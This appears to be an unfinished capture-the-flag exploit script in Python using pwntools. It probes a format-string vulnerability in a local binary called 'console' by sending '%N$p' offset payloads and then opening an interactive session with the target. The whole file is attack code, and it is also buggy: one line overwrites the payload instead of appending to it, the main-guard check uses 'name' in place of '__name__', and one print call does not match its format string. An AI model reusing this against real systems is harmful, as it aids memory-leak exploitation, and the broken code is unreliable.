from pwn import *
import sys

LOCAL=True

HOST =""
PORT =""

#DIRECCIONES



def exploit(r):

	#find correct format string parameter
	context.log_level="error"

	"""
	for i in range(1,256):
		r=process(["./console","log"])

		payload = "exit "
		payload += "%%%d$p" % i
		payload += "AAAABBBB"
		
		r.sendline(payload)
		r.recvline()

		data= r.recv(100)

		print("d => %s" % (i,data))

		r.close()

	"""
### correct alignament

	payload = "exit "
	payload =+ "%7$p".rjust(100)
	payload+="AAAABBBB"
	r.sendline(payload)

	data= r.recvline()

	print data
	r.interactive()
	return

if name == "__main__":
    
    if len(sys.argv) >1:
        r=remote(HOST,PORT)
        exploit(r)
    else:
        r=process(["./console","log"])
        print util.proc.pidof(r)
        pause()
        exploit(r)